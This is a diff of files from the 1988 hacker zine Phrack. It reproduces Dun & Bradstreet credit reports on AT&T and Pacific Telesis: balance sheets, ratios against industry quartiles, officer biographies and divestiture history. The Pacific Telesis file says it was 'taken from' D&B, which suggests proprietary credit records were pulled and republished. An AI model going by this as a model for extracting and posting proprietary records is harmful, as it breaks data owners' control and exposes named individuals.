Fix Assets to Net Worth (%) . 145.7 (3.6) 144.9 215.0 263.0
|
||||
|
||||
(EFFICIENCY)
|
||||
Coll Period (days). . . . . . 83.7 (11.1) 31.9 46.7 61.6
|
||||
Sales to Inventory. . . . . . 9.7 32.9 56.2 33.8 20.0
|
||||
Assets to Sales (%) . . . . . 114.1 (1.6) 210.5 266.1 373.4
|
||||
Sales to Net Working Cap. . . 7.8 21.9 6.3 2.3 1.1
|
||||
Acct Pay to Sales (%) . . . . 13.6 (4.2) 4.9 8.7 13.8
|
||||
|
||||
(PROFITABILITY)
|
||||
Return on Sales (%) . . . . . 0.4 (91.1) 20.1 14.6 11.3
|
||||
Return on Assets (%). . . . . 0.4 (89.5) 7.2 5.7 3.7
|
||||
Return on Net Worth (%) . . . 1.0 (90.6) 19.0 15.9 12.8
|
||||
|
||||
Industry norms based on 469 firms,
|
||||
|
||||
with assets over $5 million.
|
||||
|
||||
12/31/85 COMBINATION FISCAL
|
||||
(Figures are in THOUSANDS)
|
||||
|
||||
FINANCIALS % COMPANY INDST
|
||||
COMPANY CHANGE % NORM %
|
||||
Cash. . . . . . . . . . . . . 2,213,700 3.4 5.5 7.5
|
||||
Accounts Receivable . . . . . 8,996,100 (4.0) 22.2 5.6
|
||||
Notes Receivable. . . . . . . ---- ---- ---- 0.4
|
||||
Inventory . . . . . . . . . . 4,759,300 (0.6) 11.8 1.2
|
||||
Other Current Assets. . . . . 948,500 (8.2) 2.3 5.1
|
||||
|
||||
Total Current Assets. . . . . 16,917,600 (2.4) 41.8 19.8
|
||||
|
||||
Fixed Assets. . . . . . . . . 22,112,900 5.2 54.7 39.2
|
||||
Other Non-current Assets. . . 1,432,000 (3.2) 3.5 41.0
|
||||
|
||||
Total Assets. . . . . . . . . 40,462,500 1.6 100.0 100.0
|
||||
|
||||
|
||||
Accounts Payable. . . . . . . 4,942,800 (11.4) 12.2 4.9
|
||||
Bank Loans. . . . . . . . . . ---- ---- ---- 0.3
|
||||
Notes Payable . . . . . . . . 2,100 ---- ---- 0.8
|
||||
Other Current Liabilities . . 6,542,600 15.5 16.2 5.9
|
||||
|
||||
Total Current Liabilities . . 11,487,500 2.2 28.4 11.9
|
||||
|
||||
Other Long Term Liab. . . . . 9,553,200 2.7 23.6 46.8
|
||||
Deferred Credits. . . . . . . 4,788,500 18.9 11.8 6.8
|
||||
Net Worth . . . . . . . . . . 14,633,300 (4.1) 36.2 34.5
|
||||
|
||||
Total Liabilities & Worth. . 40,462,500 1.6 100.0 100.0
|
||||
|
||||
Net Sales . . . . . . . . . . 34,909,500 5.2 100.0 100.0
|
||||
Gross Profit. . . . . . . . . ---- ---- ---- 33.7
|
||||
Net Profit After Tax. . . . . 1,556,800 13.6 4.5 14.0
|
||||
Dividends/Withdrawals . . . . 1,382,900 3.7 4.0 13.0
|
||||
Working Capital . . . . . . . 5,430,100 (10.8) ---- ----
|
||||
|
||||
RATIOS % ---INDUSTRY QUARTILES---
|
||||
|
||||
COMPANY CHANGE UPPER MEDIAN LOWER
|
||||
(SOLVENCY)
|
||||
Quick Ratio . . . . . . . . . 1.0 ---- 2.5 1.1 0.6
|
||||
Current Ratio . . . . . . . . 1.5 ---- 3.8 1.9 0.9
|
||||
Curr Liab to Net Worth (%). . 78.5 6.5 15.8 29.4 43.9
|
||||
Curr Liab to Inventory (%). . 241.4 2.8 285.7 485.5 790.6
|
||||
Total Liab to Net Worth (%) . 176.5 9.6 134.4 190.1 320.9
|
||||
Fix Assets to Net Worth (%) . 151.1 9.7 148.4 219.0 289.5
|
||||
|
||||
(EFFICIENCY)
|
||||
Coll Period (days). . . . . . 94.1 (8.7) 31.5 47.2 63.8
|
||||
Sales to Inventory. . . . . . 7.3 5.8 52.3 31.4 18.0
|
||||
Assets to Sales (%) . . . . . 115.9 (3.4) 217.1 277.8 356.8
|
||||
Sales to Net Working Cap. . . 6.4 16.4 6.0 2.7 1.6
|
||||
Acct Pay to Sales (%) . . . . 14.2 (15.5) 6.1 10.4 15.7
|
||||
|
||||
(PROFITABILITY)
|
||||
Return on Sales (%) . . . . . 4.5 9.8 19.0 13.6 9.5
|
||||
Return on Assets (%). . . . . 3.8 11.8 6.9 5.3 3.4
|
||||
Return on Net Worth (%) . . . 10.6 17.8 19.7 15.8 12.7
|
||||
|
||||
|
||||
Industry norms based on 605 firms,
|
||||
with assets over $5 million.
|
||||
|
||||
12/31/84 COMBINATION FISCAL
|
||||
(Figures are in THOUSANDS)
|
||||
|
||||
FINANCIALS COMPANY INDST
|
||||
COMPANY % NORM %
|
||||
Cash. . . . . . . . . . . . . 2,139,900 5.4 6.6
|
||||
Accounts Receivable . . . . . 9,370,800 23.5 6.3
|
||||
Notes Receivable. . . . . . . ---- ---- 0.4
|
||||
Inventory . . . . . . . . . . 4,789,200 12.0 1.2
|
||||
Other Current Assets. . . . . 1,033,100 2.6 4.1
|
||||
|
||||
Total Current Assets. . . . . 17,333,000 43.5 18.6
|
||||
|
||||
Fixed Assets. . . . . . . . . 21,015,000 52.8 45.0
|
||||
Other Non-current Assets. . . 1,478,600 3.7 36.4
|
||||
|
||||
|
||||
Total Assets. . . . . . . . . 39,826,600 100.0 100.0
|
||||
|
||||
Accounts Payable. . . . . . . 5,580,300 14.0 5.2
|
||||
Bank Loans. . . . . . . . . . ---- ---- 0.2
|
||||
Notes Payable . . . . . . . . ---- ---- 1.0
|
||||
Other Current Liabilities . . 5,663,300 14.2 5.5
|
||||
|
||||
Total Current Liabilities . . 11,243,600 28.2 11.9
|
||||
|
||||
Other Long Term Liab. . . . . 9,300,200 23.4 47.8
|
||||
Deferred Credits. . . . . . . 4,026,000 10.1 6.5
|
||||
Net Worth . . . . . . . . . . 15,256,800 38.3 33.8
|
||||
|
||||
Total Liabilities & Worth. . 39,826,600 100.0 100.0
|
||||
|
||||
Net Sales . . . . . . . . . . 33,187,500 100.0 100.0
|
||||
Gross Profit. . . . . . . . . 16,436,200 49.5 28.1
|
||||
Net Profit After Tax. . . . . 1,369,900 4.1 14.1
|
||||
Dividends/Withdrawals . . . . 1,333,800 4.0 7.3
|
||||
Working Capital . . . . . . . 6,089,400 ---- ----
|
||||
|
||||
|
||||
RATIOS ---INDUSTRY QUARTILES---
|
||||
COMPANY UPPER MEDIAN LOWER
|
||||
(SOLVENCY)
|
||||
Quick Ratio . . . . . . . . . 1.0 2.3 1.0 0.6
|
||||
Current Ratio . . . . . . . . 1.5 3.4 1.6 0.9
|
||||
Curr Liab to Net Worth (%). . 73.7 17.7 30.6 43.5
|
||||
Curr Liab to Inventory (%). . 234.8 312.5 491.6 754.3
|
||||
Total Liab to Net Worth (%) . 161.0 139.2 193.7 314.9
|
||||
Fix Assets to Net Worth (%) . 137.7 161.5 228.9 295.3
|
||||
|
||||
(EFFICIENCY)
|
||||
Coll Period (days). . . . . . 103.1 34.3 51.6 67.8
|
||||
Sales to Inventory. . . . . . 6.9 52.1 32.6 20.1
|
||||
Assets to Sales (%) . . . . . 120.0 216.7 268.2 353.0
|
||||
Sales to Net Working Cap. . . 5.5 7.2 3.1 1.7
|
||||
Acct Pay to Sales (%) . . . . 16.8 6.2 10.9 15.4
|
||||
|
||||
(PROFITABILITY)
|
||||
Return on Sales (%) . . . . . 4.1 18.5 13.1 9.8
|
||||
|
||||
Return on Assets (%). . . . . 3.4 7.0 5.3 3.3
|
||||
Return on Net Worth (%) . . . 9.0 19.7 15.7 12.6
|
||||
|
||||
Industry norms based on 504 firms,
|
||||
with assets over $5 million.
|
||||
|
||||
|
||||
END OF DOCUMENT
|
||||
|
||||
|
||||
|
||||
|
||||
Name & Address:
|
||||
AMERICAN TELEPHONE AND Trade-Style Name:
|
||||
550 Madison Ave At & T
|
||||
NEW YORK, NY 10022
|
||||
|
||||
Telephone: 212-605-5300
|
||||
|
||||
DUNS Number: 00-698-0080
|
||||
|
||||
Line of Business: TELECOMMUNICATIONS SVCS TELE
|
||||
|
||||
Primary SIC Code: 4811
|
||||
Secondary SIC Codes: 4821 3661 3357 3573 5999
|
||||
|
||||
Year Started: 1885 (12/31/86) COMBINATION FISCAL
|
||||
Employees Total: 317,000 Sales: 34,087,000,000
|
||||
Employees Here: 1,800 Net Worth: 14,462,000,000
|
||||
|
||||
This is a PUBLIC company
|
||||
|
||||
|
||||
|
||||
HISTORY
|
||||
04/20/87
|
||||
|
||||
JAMES E. OLSON, CHB-CEO+ ROBERT E. ALLEN, PRES-COO+
|
||||
RANDALL L TOBIAS, V CHM+ CHARLES MARSHALL, V CHM+
|
||||
MORRIS TANENBAUM, V CHM+ S. LAWRENCE PRENDERGAST, V PRES-
|
||||
TREAS
|
||||
C. PERRY COLWELL, V PRES-
|
||||
CONTROLLER
|
||||
DIRECTOR(S): The officers identified by (+) and Howard H. Baker Jr,
|
||||
James H. Evans, Peter F. Haas, Philip M. Hawley, Edward G. Jefferson,
|
||||
Belton K. Johnson, Juanita M. Kreps, Donald S. Perkins, Henry B.
|
||||
Schacht, Michael I. Sovern, Donald F. McHenry, Rawleigh Warner Jr,
|
||||
Joseph D. Williams and Thomas H. Wyman.
|
||||
Incorporated New York Mar 3 1885.
|
||||
Authorized capital consists of 1,200,000,000 shares common stock $1
|
||||
par value and 100,000,000 shares preferred stock $1 par value.
|
||||
Outstanding Capital Stock at Feb 28 1987: 1,071,904,000 common
|
||||
shares and at Dec 31 1986 preferred stock outstanding consisted of
|
||||
redeemable preferred shares composed of 8,500,000 shares of $3.64
|
||||
preferred stated value $50; 8,800,000 shares of $3.74 preferred, stated
|
||||
value $50 and 25,500 shares of $77.50 preferred, stated value $1,000.
|
||||
Business started 1885.
|
||||
The company's common stock is listed on the New York, Boston,
|
||||
Midwest, Philadelphia and Pacific Coast Stock Exchanges under the symbol
|
||||
"ATT". At Dec 31 1986 there were 2,782,102 common shareholders. At Jan 1
|
||||
1986 officers and directors as a group owned less than 1% of the
|
||||
outstanding common stock with the remainder owned by the public.
|
||||
OLSON, born 1925. 1950 Univ of North Dakota, BSC. Also attended
|
||||
Univ of Pennsylvania. 1943-1946 United States Army Air Force. 1960-1970
|
||||
Northwestern Bell Telephone Co, V Pres-Gen Mgr. 1970-1974 Indiana Bell
|
||||
Telephone Co, Pres. 1974-1977 Illinois Bell Telephone Co, Pres. 1977 to
|
||||
date AT&T, 1979 V Chb-Dir; Jun 1985 President, 1986 CHM.
|
||||
MARSHALL, born 1929, married. 1951 Univ of Illinois, BS; also
|
||||
attended Bradley Univ; 1953-present AT&T; 1980 Asst Treas, 1976 Vice
|
||||
Pres-Treas; 1985 Exec Vice President, 1986 V-CHM.
|
||||
TANENBAUM, born 1928 married. 1949 Johns Hopkins Univ, BA
|
||||
chemistry. 1950 Princeton Univ, MA chemistry. 1952 PhD in physical
|
||||
chemistry. 1952 to date AT&T, various positions, 1985 Ex Vice Pres, 1986
|
||||
V-CHM.
|
||||
PRENDERGAST, born 1941 married. 1963 Brown Univ, BA. 1969 New York
|
||||
Univ, MBA. 1963-1973 Western Electric Company; 1973 to date AT&T, 1980
|
||||
Asst Treas, 1984 V Pres-Treas.
|
||||
COLWELL, born 1927. Attended AT&T Institute of Technology.
|
||||
1945-1947 U S Army. Employed by AT&T and its subsidiaries since 1948 in
|
||||
various positions. 1984 Vice Pres & Contr, AT&T Technologies Inc
|
||||
(subsidiary); 1985-present V Pres-Contr.
|
||||
ALLEN born 1935 married. 1957 Wabash College BA. Has held a
|
||||
vareity of executive position with former Bell Operating subsidiaries
|
||||
and AT&T subsidiaries. Appointed to current position in 1986.
|
||||
TOBIAS born 1943. 1964 Indiana University with a BS in Marketing.
|
||||
Has held a variety of management and executive positions with former
|
||||
Bell Operating subsidiaries and AT&T subsidiaries. Elected to current
|
||||
position in 1986.
|
||||
OTHER OFFICERS: James R. Billingsley, Sr V Pres Federal
|
||||
Regulation; Michael Brunner, Ex V Pres Federal Systems; Harold
|
||||
Burlingame, Sr V Pres Public Relations and Employee Information;
|
||||
Vittorio Cassoni, Sr V Pres Data Systems Division; Richard Holbrook, Sr
|
||||
V Pres Business Sales; Robert Kavner, Sr V Pres & CFO; Gerald Lowrie, Sr
|
||||
V Pres Public Affairs; John Nemecek, Ex V Pres Components & Electronic
|
||||
Systems; John O'Neill, Ex V Pres National Systems Products; Alfred
|
||||
Partoll, Sr V Pres External Affairs; John Segall, Sr V Pres Corporate
|
||||
Strategy & Development; Alexander Stack, Sr V Pres Communications
|
||||
Systems; Paul Villiere, Ex V Pres Network Systems Marketing and Customer
|
||||
Operations; John Zegler, Sr V Pres and General Counsel; and Lydell
|
||||
Christensen, Corp V Pres and Secretary.
|
||||
DIRECTORS: MCHENRY, research professor, Georgetown University.
|
||||
BAKER JR, partner, Vinson & Elkins and Baker, Worthington, Crossley,
|
||||
Stansberry & Woolf, attorneys. EVANS, former Chairman, Union Pacific
|
||||
Corporation. HAAS, Chairman, Levi Strauss & Company. HAWLEY, Chairman,
|
||||
Carter Hawley Hale Stores Inc. JEFFERSON, former Chairman, E.I. du Pont
|
||||
de Nemours and Company. JOHNSON, private investor and owner of The
|
||||
Chaparrosa Ranch. KREPS, former United States Secretary of Commerce.
|
||||
PERKINS, former Chairman, Jewel Companies Inc. SCHACHT, Chairman,
|
||||
Cummins Engine Company Inc. SOVERN, President, Columbia University.
|
||||
WARNER JR, former Chairman, Mobil Corporation. WILLIAMS, Chairman,
|
||||
Warner Lambert Company. WYMAN, former Chairman, CBS Inc.
|
||||
As a result of an antitrust action entered against American
|
||||
Telephone and Telegraph Company (AT&T) by the Department of Justice,
|
||||
AT&T agreed in Jan 1982 to break up its holdings. In Aug 1982, the U. S.
|
||||
District Court-District of Columbia, entered a consent decree requiring
|
||||
AT&T to divest itself of portions of its operations.
|
||||
The operations affected consisted of exchange telecommunications,
|
||||
exchange access functions, printed directory services and cellular radio
|
||||
telecommunications services. AT&T retained ownership of AT&T
|
||||
Communications Inc, AT&T Technologies Inc, Bell Telephone Laboratories
|
||||
Incorporated, AT&T Information Systems Inc, AT&T International Inc and
|
||||
those portions of the 22 Bell System Telephone Company subsidiaries
|
||||
which manufactured new customer premises equipment. The consent decree,
|
||||
with modifications, was agreed to by AT&T and the U. S. Department of
|
||||
Justice and approved by the U. S. Supreme Court in Feb 1983. In Dec
|
||||
1982, AT&T filed a plan of reorganization, outlining the means of
|
||||
compliance with the divestiture order. The plan was approved by the
|
||||
court in Aug 1983
|
||||
The divestiture completed on Jan 1 1984, was accomplished by the
|
||||
reorganization of the 22 principal AT&T Bell System Telephone Company
|
||||
subsidiaries under 7 new regional holding companies. Each AT&T common
|
||||
shareowner of record as of Dec 10 1983 received 1 share of common stock
|
||||
in each of the newly formed corporations for every 10 common shares of
|
||||
AT&T. AT&T common shareowners retained their AT&T stock ownership.
|
||||
The company has an ownership interest in certain ventures to
|
||||
include:
|
||||
(1) Owns 22% of the voting stock of Ing C. Olivetti & C., S.p.A. of
|
||||
Milan, Italy with which the company develops and markets office
|
||||
automation products in Europe.
|
||||
(2) Owns 50% of a joint venture with the N. V. Philips Company of
|
||||
the Netherlands organized to manufacture and market switching and
|
||||
transmission systems in Europe and elsewhere.
|
||||
(3) Owns 44% of a joint venture with the Goldstar Group of the
|
||||
Republic of Korea which manufactures switching products and distributes
|
||||
the company's 3B Family of Computers in Korea.
|
||||
The company also maintain stock interests in other concerns.
|
||||
In addition to joint venture activities described above,
|
||||
intercompany relations have also included occasional advances from
|
||||
subject.
|
||||
|
||||
OPERATION
|
||||
04/20/87
|
||||
|
||||
|
||||
Through subsidiaries, provides intrastate, interstate and
|
||||
international long distance telecommunications and information transport
|
||||
services, a broad range of voice and data services including, Domestic
|
||||
and Long Distance Service, Wide Area Telecommunications Services (WATS),
|
||||
800 Service, 900 Dial It Services and a series of low, medium and high
|
||||
speed digital voice and data services known as Accunet Digital Services.
|
||||
Also manufactures telephone communications equipment and apparatus,
|
||||
communications wire and cable, computers for use in communications
|
||||
systems, as well as for general purposes, retails and leases telephone
|
||||
communications equipment and provides research and development in
|
||||
information and telecommunications technology. The company is subject to
|
||||
the jurisdiction of the Federal Communications Commission with respect
|
||||
to interstate and international rates, lines, services and other
|
||||
matters. Terms: Net 30, cash and contract providing for progress
|
||||
payments with final payment upon completion. The company's AT&T
|
||||
Communications Inc subsidiary provides interstate and intrastate long
|
||||
distance communications services for 80 million residential customers
|
||||
and 7 million businesses. Sells to a wide variety of businesses,
|
||||
government agencies, individuals and others. Nonseasonal.
|
||||
EMPLOYEES: 317,000 including officers. 1,800 employed here.
|
||||
FACILITIES: Owns premises in multi story steel building in good
|
||||
condition. Premises neat.
|
||||
LOCATION: Central business section on main street.
|
||||
BRANCHES: The company's subsidiaries operate 19 major manufacturing
|
||||
plants located throughout the United States containing a total 26.2
|
||||
million square feet of space of which 1.49 million square feet were in
|
||||
leased premises. There are 7 regional centers and 24 distribution
|
||||
centers. In addition, there are numerous domestic and foreign branch
|
||||
offices.
|
||||
SUBSIDIARIES: The company had numerous subsidiaries as of Dec 31
|
||||
1986. Subsidiaries perform the various services and other functions
|
||||
described above. Its unconsolidated finance subsidiary, AT&T Credit
|
||||
Corporation, provides financing to customers through leasing and
|
||||
installment sales programs and purchases from AT&T's subsidiaries the
|
||||
rights to receivables under long-term service agreements. Intercompany
|
||||
relations consists of parent making occasional advances to subsidiaries
|
||||
and service transactions settled on a convenience basis. A list of
|
||||
principal subsidiaries as of Dec 31 1986 is on file at the Millburn, NJ
|
||||
office of Dun & Bradstreet.
|
||||
08-27(9Z0 /61) 00703 001 678 NH
|
||||
|
||||
Chemical Bank, 277 Park Ave; Marine Midland Bank, 140 Broadway; Chase
|
||||
Manhattan Bank, 1 Chase Manhattan Plaza
|
||||
|
||||
12/31/86 COMBINATION FISCAL
|
||||
(Figures are in THOUSANDS)
|
||||
|
||||
FINANCIALS % COMPANY INDST
|
||||
COMPANY CHANGE % NORM %
|
||||
Total Current Assets. . . . . 15,572,000 (8.0) 40.0 22.0
|
||||
Fixed Assets. . . . . . . . . 21,078,000 (4.7) 54.2 35.6
|
||||
Other Non-current Assets. . . 2,233,000 55.9 5.7 42.4
|
||||
Total Assets. . . . . . . . . 38,883,000 (3.9) 100.0 100.0
|
||||
Total Current Liabilities . . 11,217,000 (2.4) 28.8 11.6
|
||||
Other Long Term Liab. . . . . 13,204,000 38.2 34.0 46.8
|
||||
Net Worth . . . . . . . . . . 14,462,000 (1.2) 37.2 35.2
|
||||
Total Liabilities & Worth. . 38,883,000 (3.9) 100.0 100.0
|
||||
Net Sales . . . . . . . . . . 34,087,000 (2.4) 100.0 100.0
|
||||
Gross Profit. . . . . . . . . 15,838,000 ---- 46.5 40.1
|
||||
|
||||
RATIOS % ---INDUSTRY QUARTILES---
|
||||
|
||||
COMPANY CHANGE UPPER MEDIAN LOWER
|
||||
Quick Ratio . . . . . . . . . 0.9 (10.0) 2.9 1.2 0.6
|
||||
Current Ratio . . . . . . . . 1.4 (6.7) 4.9 2.2 1.0
|
||||
Total Liab to Net Worth (%) . 168.9 (4.3) 127.4 180.2 297.2
|
||||
Sales to Inventory. . . . . . 9.7 32.9 56.2 33.8 20.0
|
||||
Return on Sales (%) . . . . . 0.4 (91.1) 20.1 14.6 11.3
|
||||
Return on Assets (%). . . . . 0.4 (89.5) 7.2 5.7 3.7
|
||||
Return on Net Worth (%) . . . 1.0 (90.6) 19.0 15.9 12.8
|
||||
|
||||
Industry norms based on 469 firms,
|
||||
with assets over $5 million.
|
||||
|
||||
|
||||
End_of_File.
|
493
phrack17/3.txt
Normal file
493
phrack17/3.txt
Normal file
|
@ -0,0 +1,493 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 3 of 12 : Dun & Bradstreet Report on Pacific Telesis
|
||||
|
||||
|
||||
|
||||
Pacific Telesis Credit File, taken from Dun & Bradstreet by Elric of Imrryr
|
||||
|
||||
|
||||
|
||||
Name & Address:
|
||||
PACIFIC TELESIS GROUP (INC)
|
||||
140 New Montgomery St
|
||||
SAN FRANCISCO, CA 94105
|
||||
|
||||
Telephone: 415-882-8000
|
||||
|
||||
DUNS Number: 10-346-0846
|
||||
|
||||
Line of Business: TELECOMMUNICATION SERVICES
|
||||
|
||||
Primary SIC Code: 4811
|
||||
Secondary SIC Codes: 2741 5063 5732 6159
|
||||
|
||||
Year Started: 1906 (12/31/86) COMBINATION FISCAL
|
||||
Employees Total: 74,937 Sales: 8,977,300,000
|
||||
Employees Here: 2,000 Net Worth: 7,753,300,000
|
||||
|
||||
This is a PUBLIC company
|
||||
|
||||
|
||||
12/31/86 COMBINATION FISCAL
|
||||
(Figures are in THOUSANDS)
|
||||
|
||||
FINANCIALS % COMPANY INDST
|
||||
COMPANY CHANGE % NORM %
|
||||
Cash. . . . . . . . . . . . . 200,600 671.5 1.0 9.0
|
||||
Accounts Receivable . . . . . 1,390,700 (3.8) 6.8 5.7
|
||||
Notes Receivable. . . . . . . ---- ---- ---- 0.2
|
||||
Inventory . . . . . . . . . . 116,300 (4.4) 0.6 1.3
|
||||
Other Current Assets. . . . . 448,700 18.6 2.2 5.8
|
||||
|
||||
Total Current Assets. . . . . 2,156,300 9.3 10.6 22.0
|
||||
|
||||
Fixed Assets. . . . . . . . . 17,244,900 1.6 84.9 35.6
|
||||
Other Non-current Assets. . . 919,300 53.8 4.5 42.4
|
||||
|
||||
Total Assets. . . . . . . . . 20,320,500 4.0 100.0 100.0
|
||||
|
||||
Accounts Payable. . . . . . . 1,760,300 74.1 8.7 4.2
|
||||
Bank Loans. . . . . . . . . . 21,800 847.8 0.1 0.2
|
||||
|
||||
Notes Payable . . . . . . . . ---- ---- ---- 1.0
|
||||
Other Current Liabilities . . 623,000 (35.8) 3.1 6.2
|
||||
|
||||
Total Current Liabilities . . 2,405,100 21.3 11.8 11.6
|
||||
|
||||
Other Long Term Liab. . . . . 5,564,600 (7.6) 27.4 46.8
|
||||
Deferred Credits. . . . . . . 4,597,500 9.0 22.6 6.4
|
||||
Net Worth . . . . . . . . . . 7,753,300 6.0 38.2 35.2
|
||||
|
||||
Total Liabilities & Worth. . 20,320,500 4.0 100.0 100.0
|
||||
|
||||
Net Sales . . . . . . . . . . 8,977,300 5.6 100.0 100.0
|
||||
Gross Profit. . . . . . . . . ---- ---- ---- 40.1
|
||||
Net Profit After Tax. . . . . 1,079,400 16.2 12.0 15.3
|
||||
Dividends/Withdrawals . . . . 654,100 10.0 7.3 7.7
|
||||
Working Capital . . . . . . . 248,800 (999.9) ---- ----
|
||||
|
||||
RATIOS % ---INDUSTRY QUARTILES---
|
||||
COMPANY CHANGE UPPER MEDIAN LOWER
|
||||
(SOLVENCY)
|
||||
|
||||
Quick Ratio . . . . . . . . . 0.7 ---- 2.9 1.2 0.6
|
||||
Current Ratio . . . . . . . . 0.9 (10.0) 4.9 2.2 1.0
|
||||
Curr Liab to Net Worth (%). . 31.0 14.4 13.2 26.4 38.1
|
||||
Curr Liab to Inventory (%). . 999.9 26.9 244.8 475.8 675.0
|
||||
Total Liab to Net Worth (%) . 162.1 (2.9) 127.4 180.2 297.2
|
||||
Fix Assets to Net Worth (%) . 222.4 (4.1) 144.9 215.0 263.0
|
||||
|
||||
(EFFICIENCY)
|
||||
Coll Period (days). . . . . . 56.5 (9.0) 31.9 46.7 61.6
|
||||
Sales to Inventory. . . . . . 77.2 10.6 56.2 33.8 20.0
|
||||
Assets to Sales (%) . . . . . 226.4 (1.5) 210.5 266.1 373.4
|
||||
Sales to Net Working Cap. . . ---- ---- 6.3 2.3 1.1
|
||||
Acct Pay to Sales (%) . . . . 19.6 64.7 4.9 8.7 13.8
|
||||
|
||||
(PROFITABILITY)
|
||||
Return on Sales (%) . . . . . 12.0 10.1 20.1 14.6 11.3
|
||||
Return on Assets (%). . . . . 5.3 10.4 7.2 5.7 3.7
|
||||
Return on Net Worth (%) . . . 13.9 9.4 19.0 15.9 12.8
|
||||
|
||||
Industry norms based on 469 firms,
|
||||
|
||||
with assets over $5 million.
|
||||
|
||||
12/31/85 COMBINATION FISCAL
|
||||
(Figures are in THOUSANDS)
|
||||
|
||||
FINANCIALS % COMPANY INDST
|
||||
COMPANY CHANGE % NORM %
|
||||
Cash. . . . . . . . . . . . . 26,000 550.0 0.1 7.5
|
||||
Accounts Receivable . . . . . 1,446,200 20.6 7.4 5.6
|
||||
Notes Receivable. . . . . . . ---- ---- ---- 0.4
|
||||
Inventory . . . . . . . . . . 121,700 ---- 0.6 1.2
|
||||
Other Current Assets. . . . . 378,300 (8.3) 1.9 5.1
|
||||
|
||||
Total Current Assets. . . . . 1,972,200 22.1 10.1 19.8
|
||||
|
||||
Fixed Assets. . . . . . . . . 16,968,400 6.1 86.8 39.2
|
||||
Other Non-current Assets. . . 597,700 29.4 3.1 41.0
|
||||
|
||||
Total Assets. . . . . . . . . 19,538,300 8.1 100.0 100.0
|
||||
|
||||
|
||||
Accounts Payable. . . . . . . 1,011,100 14.6 5.2 4.9
|
||||
Bank Loans. . . . . . . . . . 2,300 ---- ---- 0.3
|
||||
Notes Payable . . . . . . . . ---- ---- ---- 0.8
|
||||
Other Current Liabilities . . 969,900 18.6 5.0 5.9
|
||||
|
||||
Total Current Liabilities . . 1,983,300 (1.0) 10.2 11.9
|
||||
|
||||
Other Long Term Liab. . . . . 6,021,700 0.8 30.8 46.8
|
||||
Deferred Credits. . . . . . . 4,216,300 16.6 21.6 6.8
|
||||
Net Worth . . . . . . . . . . 7,317,000 12.9 37.4 34.5
|
||||
|
||||
Total Liabilities & Worth. . 19,538,300 8.1 100.0 100.0
|
||||
|
||||
Net Sales . . . . . . . . . . 8,498,600 8.6 100.0 100.0
|
||||
Gross Profit. . . . . . . . . ---- ---- ---- 33.7
|
||||
Net Profit After Tax. . . . . 929,100 12.1 10.9 14.0
|
||||
Dividends/Withdrawals . . . . 594,400 11.9 7.0 13.0
|
||||
Working Capital . . . . . . . 11,100 ---- ---- ----
|
||||
|
||||
RATIOS % ---INDUSTRY QUARTILES---
|
||||
|
||||
COMPANY CHANGE UPPER MEDIAN LOWER
|
||||
(SOLVENCY)
|
||||
Quick Ratio . . . . . . . . . 0.7 16.7 2.5 1.1 0.6
|
||||
Current Ratio . . . . . . . . 1.0 25.0 3.8 1.9 0.9
|
||||
Curr Liab to Net Worth (%). . 27.1 (12.3) 15.8 29.4 43.9
|
||||
Curr Liab to Inventory (%). . 999.9 ---- 285.7 485.5 790.6
|
||||
Total Liab to Net Worth (%) . 167.0 (6.7) 134.4 190.1 320.9
|
||||
Fix Assets to Net Worth (%) . 231.9 (6.0) 148.4 219.0 289.5
|
||||
|
||||
(EFFICIENCY)
|
||||
Coll Period (days). . . . . . 62.1 11.1 31.5 47.2 63.8
|
||||
Sales to Inventory. . . . . . 69.8 ---- 52.3 31.4 18.0
|
||||
Assets to Sales (%) . . . . . 229.9 (0.5) 217.1 277.8 356.8
|
||||
Sales to Net Working Cap. . . ---- ---- 6.0 2.7 1.6
|
||||
Acct Pay to Sales (%) . . . . 11.9 5.3 6.1 10.4 15.7
|
||||
|
||||
(PROFITABILITY)
|
||||
Return on Sales (%) . . . . . 10.9 2.8 19.0 13.6 9.5
|
||||
Return on Assets (%). . . . . 4.8 4.3 6.9 5.3 3.4
|
||||
Return on Net Worth (%) . . . 12.7 (0.8) 19.7 15.8 12.7
|
||||
|
||||
|
||||
Industry norms based on 605 firms,
|
||||
with assets over $5 million.
|
||||
|
||||
12/31/84 COMBINATION FISCAL
|
||||
(Figures are in THOUSANDS)
|
||||
|
||||
FINANCIALS COMPANY INDST
|
||||
COMPANY % NORM %
|
||||
Cash. . . . . . . . . . . . . 4,000 ---- 6.6
|
||||
Accounts Receivable . . . . . 1,198,800 6.6 6.3
|
||||
Notes Receivable. . . . . . . ---- ---- 0.4
|
||||
Inventory . . . . . . . . . . ---- ---- 1.2
|
||||
Other Current Assets. . . . . 412,400 2.3 4.1
|
||||
|
||||
Total Current Assets. . . . . 1,615,200 8.9 18.6
|
||||
|
||||
Fixed Assets. . . . . . . . . 15,999,500 88.5 45.0
|
||||
Other Non-current Assets. . . 461,800 2.6 36.4
|
||||
|
||||
|
||||
Total Assets. . . . . . . . . 18,076,500 100.0 100.0
|
||||
|
||||
Accounts Payable. . . . . . . 882,100 4.9 5.2
|
||||
Bank Loans. . . . . . . . . . ---- ---- 0.2
|
||||
Notes Payable . . . . . . . . 304,000 1.7 1.0
|
||||
Other Current Liabilities . . 817,600 4.5 5.5
|
||||
|
||||
Total Current Liabilities . . 2,003,700 11.1 11.9
|
||||
|
||||
Other Long Term Liab. . . . . 5,973,500 33.0 47.8
|
||||
Deferred Credits. . . . . . . 3,617,000 20.0 6.5
|
||||
Net Worth . . . . . . . . . . 6,482,300 35.9 33.8
|
||||
|
||||
Total Liabilities & Worth. . 18,076,500 100.0 100.0
|
||||
|
||||
Net Sales . . . . . . . . . . 7,824,300 100.0 100.0
|
||||
Gross Profit. . . . . . . . . ---- ---- 28.1
|
||||
Net Profit After Tax. . . . . 828,500 10.6 14.1
|
||||
Dividends/Withdrawals . . . . 531,200 6.8 7.3
|
||||
Working Capital . . . . . . . 388,500 ---- ----
|
||||
|
||||
|
||||
RATIOS ---INDUSTRY QUARTILES---
|
||||
COMPANY UPPER MEDIAN LOWER
|
||||
(SOLVENCY)
|
||||
Quick Ratio . . . . . . . . . 0.6 2.3 1.0 0.6
|
||||
Current Ratio . . . . . . . . 0.8 3.4 1.6 0.9
|
||||
Curr Liab to Net Worth (%). . 30.9 17.7 30.6 43.5
|
||||
Curr Liab to Inventory (%). . ---- 312.5 491.6 754.3
|
||||
